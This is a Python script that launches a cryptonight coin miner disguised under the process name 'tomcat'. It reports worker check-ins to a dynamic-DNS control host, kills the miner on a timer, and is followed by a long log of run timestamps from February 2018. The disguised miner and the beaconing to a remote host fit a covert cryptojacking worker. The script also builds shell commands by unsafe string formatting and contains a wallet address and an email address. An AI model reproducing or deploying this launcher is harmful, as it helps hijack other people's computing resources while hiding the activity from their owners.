import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:05.212946
#2018-02-17 16:47:05.613935
#2018-02-17 18:35:04.842379
#2018-02-17 20:22:06.221869
#2018-02-17 22:09:01.783568
#2018-02-17 23:53:04.695080
#2018-02-18 01:43:05.828818
#2018-02-18 03:31:01.574748
#2018-02-18 05:18:01.597031
#2018-02-18 07:11:05.189694
#2018-02-18 09:00:09.308811
#2018-02-18 10:47:05.690654
#2018-02-18 12:31:05.030365
#2018-02-18 14:18:06.459051
#2018-02-18 16:09:07.598435
#2018-02-18 17:58:06.588348
#2018-02-18 19:45:08.692787
#2018-02-18 21:31:07.670297
#2018-02-18 23:19:06.133174
#2018-02-19 01:07:05.378934
#2018-02-19 02:53:04.367306
#2018-02-19 04:41:06.817078
#2018-02-19 06:25:09.031351
#2018-02-19 08:14:01.804535
#2018-02-19 10:03:07.962915
#2018-02-19 11:51:01.263180
#2018-02-19 13:38:06.072360
#2018-02-19 15:27:06.297162
#2018-02-19 17:16:01.774925
#2018-02-19 19:04:06.133052
#2018-02-19 20:51:07.997933
#2018-02-19 22:38:04.668421
#2018-02-20 00:23:04.827659
#2018-02-20 02:11:04.551899
#2018-02-20 04:02:06.498071
#2018-02-20 05:45:09.616929
#2018-02-20 07:30:10.167938
#2018-02-20 09:15:04.105123
#2018-02-20 10:58:04.393358
#2018-02-20 12:45:06.349242
#2018-02-20 14:30:09.465885
#2018-02-20 16:14:09.591760
#2018-02-20 17:59:06.985159
#2018-02-20 19:51:10.826426
#2018-02-20 21:40:07.427707
#2018-02-20 23:20:08.607043
#2018-02-21 01:05:09.429014
#2018-02-21 02:52:05.819553
#2018-02-21 04:40:01.698844
#2018-02-21 06:27:04.403842
#2018-02-21 08:12:06.037678
#2018-02-21 09:58:05.321174
#2018-02-21 11:45:07.598035
#2018-02-21 13:34:07.242587
#2018-02-21 15:19:05.878754
#2018-02-21 17:09:04.423618
#2018-02-21 18:56:02.060047
#2018-02-21 20:46:07.401289
#2018-02-21 22:31:08.568876
#2018-02-22 00:22:06.288497
#2018-02-22 02:10:06.772653
#2018-02-22 03:57:06.934441
#2018-02-22 05:44:07.855008
#2018-02-22 07:29:07.019536
#2018-02-22 09:17:05.313180
#2018-02-22 11:04:01.442387
#2018-02-22 12:51:10.034136
#2018-02-22 14:38:01.603629
#2018-02-22 16:23:01.247059
#2018-02-22 18:10:03.231723
#2018-02-22 20:02:05.841564
#2018-02-22 21:52:06.849247
#2018-02-22 23:39:06.546021
#2018-02-23 01:27:04.604273
#2018-02-23 03:13:01.328667
#2018-02-23 04:59:07.306157
#2018-02-23 06:44:08.354697
#2018-02-23 08:37:06.168084
#2018-02-23 10:52:07.682960
#2018-02-23 12:49:08.863085
#2018-02-23 14:33:04.824990
#2018-02-23 16:23:07.590954
#2018-02-23 18:09:07.241728
#2018-02-23 19:54:05.872495
#2018-02-23 21:39:02.107319
#2018-02-23 23:27:01.852662
#2018-02-24 01:19:05.513715
#2018-02-24 03:09:05.132321
#2018-02-24 04:55:05.434065
#2018-02-24 06:40:06.715218
#2018-02-24 08:29:05.967180
#2018-02-24 10:16:03.824859
#2018-02-24 12:11:06.842572
#2018-02-24 13:58:03.456824
#2018-02-24 15:49:05.439513
#2018-02-24 17:47:05.047163
#2018-02-24 19:35:09.035792
#2018-02-24 21:22:05.730306
#2018-02-25 00:03:05.700974
#2018-02-25 03:17:06.172930
#2018-02-25 07:00:10.345358